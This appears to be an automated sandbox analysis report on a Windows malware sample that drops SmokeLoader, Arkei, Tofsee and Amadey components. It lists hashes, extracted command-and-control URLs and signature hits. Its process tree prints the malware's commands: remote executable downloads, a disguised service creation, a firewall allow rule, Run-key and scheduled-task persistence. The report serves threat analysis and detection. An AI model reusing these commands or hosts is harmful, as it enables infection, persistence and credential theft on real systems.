Analysis
-
max time kernel
128s -
max time network
153s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 19:46
Static task
static1
General
-
Target
a7444553f8a8fe2702b6fd48008d6605.exe
-
Size
277KB
-
MD5
a7444553f8a8fe2702b6fd48008d6605
-
SHA1
f6d3d6ccf728ae7ab39b7e29f21ae5bcc7fce98b
-
SHA256
ba5303301925a877689b30efc36f872564f06906b2a61d7c3a7c955b0587d4f8
-
SHA512
28a1edb043ae30af213cbfe93745f2d94a4f9f5b76668cbed0889780dc7031e4a6d1caa839d78035a42769bc13d2d0a376e13e50779807edbcd3189d44f070bf
Malware Config
Extracted
smokeloader
2020
http://host-data-coin-11.com/
http://file-coin-host-12.com/
Extracted
arkei
Default
http://file-file-host4.com/tratata.php
Extracted
tofsee
patmushta.info
parubey.info
Extracted
amadey
3.01
185.215.113.35/d2VxjasuwS/index.php
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
Arkei Stealer Payload 2 IoCs
resource yara_rule behavioral1/memory/1988-88-0x0000000000220000-0x000000000023C000-memory.dmp family_arkei behavioral1/memory/1988-89-0x0000000000400000-0x0000000000458000-memory.dmp family_arkei -
LoaderBot executable 1 IoCs
resource yara_rule behavioral1/memory/1992-164-0x0000000000D90000-0x00000000011EB000-memory.dmp loaderbot -
Blocklisted process makes network request 2 IoCs
flow pid Process 83 1568 WScript.exe 85 1568 WScript.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 23 IoCs
pid Process 576 8B7D.exe 1940 93DC.exe 1988 AE8D.exe 1196 C411.exe 1944 D8F9.exe 1112 93DC.exe 1724 D8F9.exe 1356 gzotmolu.exe 1532 5223.exe 1620 mjlooy.exe 1664 5936.exe 1880 extd.exe 1868 extd.exe 1472 setup_c.exe 1720 7040.exe 1992 setup_m.exe 1624 extd.exe 1500 setup_s.exe 1384 extd.exe 1720 7040.exe 1672 9435.exe 1804 A2E5.exe 1540 C803.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral1/files/0x0005000000014073-132.dat upx behavioral1/files/0x0005000000014073-130.dat upx behavioral1/files/0x0005000000014073-143.dat upx behavioral1/files/0x0005000000014073-153.dat upx behavioral1/files/0x0005000000014073-160.dat upx behavioral1/files/0x0005000000014073-172.dat upx -
Deletes itself 1 IoCs
pid Process 1392 Process not Found -
Loads dropped DLL 4 IoCs
pid Process 1940 93DC.exe 1944 D8F9.exe 1532 5223.exe 1532 5223.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" setup_s.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1992 setup_m.exe 1500 setup_s.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1452 set thread context of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1940 set thread context of 1112 1940 93DC.exe 35 PID 1944 set thread context of 1724 1944 D8F9.exe 36 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7444553f8a8fe2702b6fd48008d6605.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 93DC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 93DC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 93DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7444553f8a8fe2702b6fd48008d6605.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a7444553f8a8fe2702b6fd48008d6605.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1384 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
pid Process 1880 extd.exe 1868 extd.exe 1472 setup_c.exe 1720 7040.exe 1992 setup_m.exe 1624 extd.exe 1500 setup_s.exe 1384 extd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1084 a7444553f8a8fe2702b6fd48008d6605.exe 1084 a7444553f8a8fe2702b6fd48008d6605.exe 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found 1392 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1392 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1084 a7444553f8a8fe2702b6fd48008d6605.exe 1112 93DC.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1944 D8F9.exe Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeShutdownPrivilege 1392 Process not Found Token: SeDebugPrivilege 1500 setup_s.exe Token: SeDebugPrivilege 1992 setup_m.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1392 Process not Found 1392 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1392 Process not Found 1392 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1452 wrote to memory of 1084 1452 a7444553f8a8fe2702b6fd48008d6605.exe 27 PID 1392 wrote to memory of 576 1392 Process not Found 28 PID 1392 wrote to memory of 576 1392 Process not Found 28 PID 1392 wrote to memory of 576 1392 Process not Found 28 PID 1392 wrote to memory of 576 1392 Process not Found 28 PID 1392 wrote to memory of 1940 1392 Process not Found 29 PID 1392 wrote to memory of 1940 1392 Process not Found 29 PID 1392 wrote to memory of 1940 1392 Process not Found 29 PID 1392 wrote to memory of 1940 1392 Process not Found 29 PID 1392 wrote to memory of 1988 1392 Process not Found 30 PID 1392 wrote to memory of 1988 1392 Process not Found 30 PID 1392 wrote to memory of 1988 1392 Process not Found 30 PID 1392 wrote to memory of 1988 1392 Process not Found 30 PID 1392 wrote to memory of 1196 1392 Process not Found 31 PID 1392 wrote to memory of 1196 1392 Process not Found 31 PID 1392 wrote to memory of 1196 1392 Process not Found 31 PID 1392 wrote to memory of 1196 1392 Process not Found 31 PID 1392 wrote to memory of 1944 1392 Process not Found 32 PID 1392 wrote to memory of 1944 1392 Process not Found 32 PID 1392 wrote to memory of 1944 1392 Process not Found 32 PID 1392 wrote to memory of 1944 1392 Process not Found 32 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1940 wrote to memory of 1112 1940 93DC.exe 35 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1196 wrote to memory of 1168 1196 C411.exe 37 PID 1196 wrote to memory of 1168 1196 C411.exe 37 PID 1196 wrote to memory of 1168 1196 C411.exe 37 PID 1196 wrote to memory of 1168 1196 C411.exe 37 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1944 wrote to memory of 1724 1944 D8F9.exe 36 PID 1196 wrote to memory of 1864 1196 C411.exe 39 PID 1196 wrote to memory of 1864 1196 C411.exe 39 PID 1196 wrote to memory of 1864 1196 C411.exe 39 PID 1196 wrote to memory of 1864 1196 C411.exe 39 PID 1196 wrote to memory of 1700 1196 C411.exe 41 PID 1196 wrote to memory of 1700 1196 C411.exe 41 PID 1196 wrote to memory of 1700 1196 C411.exe 41 PID 1196 wrote to memory of 1700 1196 C411.exe 41 PID 1196 wrote to memory of 1292 1196 C411.exe 43 PID 1196 wrote to memory of 1292 1196 C411.exe 43 PID 1196 wrote to memory of 1292 1196 C411.exe 43 PID 1196 wrote to memory of 1292 1196 C411.exe 43 PID 1196 wrote to memory of 1580 1196 C411.exe 45 PID 1196 wrote to memory of 1580 1196 C411.exe 45 PID 1196 wrote to memory of 1580 1196 C411.exe 45 PID 1196 wrote to memory of 1580 1196 C411.exe 45 PID 1196 wrote to memory of 1216 1196 C411.exe 49
Processes
-
C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"C:\Users\Admin\AppData\Local\Temp\a7444553f8a8fe2702b6fd48008d6605.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1084
-
-
C:\Users\Admin\AppData\Local\Temp\8B7D.exeC:\Users\Admin\AppData\Local\Temp\8B7D.exe1⤵
- Executes dropped EXE
PID:576
-
C:\Users\Admin\AppData\Local\Temp\93DC.exeC:\Users\Admin\AppData\Local\Temp\93DC.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\93DC.exeC:\Users\Admin\AppData\Local\Temp\93DC.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\AE8D.exeC:\Users\Admin\AppData\Local\Temp\AE8D.exe1⤵
- Executes dropped EXE
PID:1988
-
C:\Users\Admin\AppData\Local\Temp\C411.exeC:\Users\Admin\AppData\Local\Temp\C411.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\njjjzucd\2⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gzotmolu.exe" C:\Windows\SysWOW64\njjjzucd\2⤵PID:1864
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create njjjzucd binPath= "C:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d\"C:\Users\Admin\AppData\Local\Temp\C411.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:1700
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description njjjzucd "wifi internet conection"2⤵PID:1292
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start njjjzucd2⤵PID:1580
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\D8F9.exeC:\Users\Admin\AppData\Local\Temp\D8F9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\D8F9.exeC:\Users\Admin\AppData\Local\Temp\D8F9.exe2⤵
- Executes dropped EXE
PID:1724
-
-
C:\Windows\SysWOW64\njjjzucd\gzotmolu.exeC:\Windows\SysWOW64\njjjzucd\gzotmolu.exe /d"C:\Users\Admin\AppData\Local\Temp\C411.exe"1⤵
- Executes dropped EXE
PID:1356
-
C:\Users\Admin\AppData\Local\Temp\5223.exeC:\Users\Admin\AppData\Local\Temp\5223.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"2⤵
- Executes dropped EXE
PID:1620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\3⤵PID:460
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\4⤵PID:1560
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F3⤵
- Creates scheduled task(s)
PID:1384
-
-
-
C:\Users\Admin\AppData\Local\Temp\5936.exeC:\Users\Admin\AppData\Local\Temp\5936.exe1⤵
- Executes dropped EXE
PID:1664 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\5BB9.bat C:\Users\Admin\AppData\Local\Temp\5936.exe"2⤵PID:1612
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1880
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/KX6KAZ9Tip.exe" "setup_c.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1868
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\722\123.vbs"3⤵
- Blocklisted process makes network request
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_c.exesetup_c.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/RMR.exe" "setup_m.exe" "" "" "" "" "" ""3⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_m.exesetup_m.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "/download" "http://a0621298.xsph.ru/c_setup.exe" "setup_s.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\722\setup_s.exesetup_s.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5BA7.tmp\5BB8.tmp\extd.exe "" "" "" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1384
-
-
-
C:\Users\Admin\AppData\Local\Temp\7040.exeC:\Users\Admin\AppData\Local\Temp\7040.exe1⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1720
-
C:\Users\Admin\AppData\Local\Temp\9435.exeC:\Users\Admin\AppData\Local\Temp\9435.exe1⤵
- Executes dropped EXE
PID:1672
-
C:\Users\Admin\AppData\Local\Temp\A2E5.exeC:\Users\Admin\AppData\Local\Temp\A2E5.exe1⤵
- Executes dropped EXE
PID:1804
-
C:\Users\Admin\AppData\Local\Temp\C803.exeC:\Users\Admin\AppData\Local\Temp\C803.exe1⤵
- Executes dropped EXE
PID:1540
-
C:\Users\Admin\AppData\Local\Temp\D7FB.exeC:\Users\Admin\AppData\Local\Temp\D7FB.exe1⤵PID:2024